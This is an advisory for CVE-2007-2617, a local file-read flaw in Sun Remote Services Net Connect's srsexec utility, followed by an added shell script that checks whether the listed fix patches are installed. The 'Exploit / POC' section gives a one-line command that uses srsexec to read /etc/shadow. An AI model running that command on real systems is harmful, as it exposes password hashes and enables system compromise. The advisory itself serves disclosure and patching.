Sun Microsystems Solaris SRSEXEC Arbitrary File Read Local Information Disclosure Vulnerability
BID:23915
Info
| Bugtraq ID: | 23915 |
| Class: | Design Error |
| CVE: | CVE-2007-2617 |
| Remote: | No |
| Local: | Yes |
| Published: | May 10 2007 12:00AM |
| Updated: | May 07 2015 05:39PM |
| Credit: | An anonymous researcher is credited with the discovery of this vulnerability. |
| Vulnerable: | Sun Sun Remote Services (SRS) Net Connect Software 3.2.4; Sun Sun Remote Services (SRS) Net Connect Software 3.2.3 |
| Not Vulnerable: | |
Discussion
Sun Microsystems Solaris is prone to a local information-disclosure vulnerability due to a design error.
A local attacker may exploit this issue to access sensitive information, including superuser password information, that may lead to further attacks. A complete compromise is possible.
Exploit / POC
An attacker can exploit this issue by gaining local access to a vulnerable computer and running the 'srsexec' utility on a protected file.
The following exploit example is available:
$ /opt/SUNWsrspx/bin/srsexec -dvb /etc/shadow OWNED
Solution / Fix
Solution:
The vendor released updates to address this issue. Please see the references for more information.
Sun Sun Remote Services (SRS) Net Connect Software 3.2.3
- Sun 125713-01 http://sunsolve.sun.com/patches/
Sun Sun Remote Services (SRS) Net Connect Software 3.2.4
- Sun 123870-02 http://sunsolve.sun.com/patches/
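The following patch-level check is an added example, not part of the original advisory or vendor material. It maps each affected version to the patch ID listed above and reads `showrev -p` style output on stdin; the function names, the sample lines and the package name in them are constructed for illustration.

```sh
# Added example: decide from `showrev -p` output whether the fix patch named
# in this advisory is installed. Written for a POSIX shell; on Solaris 10 run
# it under /usr/xpg4/bin/sh or ksh rather than the legacy /bin/sh.

# highest_rev BASE: read patch listing lines on stdin and print the highest
# installed revision of patch BASE (empty output if the patch is absent).
highest_rev() {
    best=
    while read -r tag id rest; do
        [ "$tag" = "Patch:" ] || continue
        case "$id" in "$1"-*) rev=${id#"$1"-} ;; *) continue ;; esac
        rev=${rev#0}                                  # "02" -> "2", never read as octal
        case "$rev" in ''|*[!0-9]*) continue ;; esac  # skip malformed revisions
        if [ -z "$best" ] || [ "$rev" -gt "$best" ]; then best=$rev; fi
    done
    echo "$best"
}

# srs_fix_status VERSION: VERSION is the installed SRS Net Connect version.
# Prints patched, unpatched or unknown-version. A later revision of the same
# patch ID counts as patched; patches that obsolete it under a different ID
# are not tracked here.
srs_fix_status() {
    case "$1" in
        3.2.3) base=125713 min=1 ;;   # fix listed in the advisory: 125713-01
        3.2.4) base=123870 min=2 ;;   # fix listed in the advisory: 123870-02
        *) echo unknown-version; return 0 ;;
    esac
    have=$(highest_rev "$base")
    if [ -n "$have" ] && [ "$have" -ge "$min" ]; then
        echo patched
    else
        echo unpatched
    fi
}

# Constructed sample listing (not captured from a real host): a 3.2.4 system
# that only has revision -01 of the fix patch, plus an unrelated patch.
SAMPLE='Patch: 123870-01 Obsoletes:  Requires:  Incompatibles:  Packages: SUNWsrspx
Patch: 999999-05 Obsoletes:  Requires:  Incompatibles:  Packages: EXAMPLEpkg'

printf '%s\n' "$SAMPLE" | srs_fix_status 3.2.4

# On a live host: showrev -p | srs_fix_status 3.2.4
# and confirm whether the utility is present: ls -l /opt/SUNWsrspx/bin/srsexec
```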
References
References:
- iDefense Security Advisory 05.10.07: Sun Microsystems Solaris SRS Proxy Core srs (iDefense Labs)
- Solaris Homepage (Sun Microsystems)
- Sun Alert ID 102891 Security Vulnerability in Sun Remote Services (SRS) Net Conn (Sun Microsystems)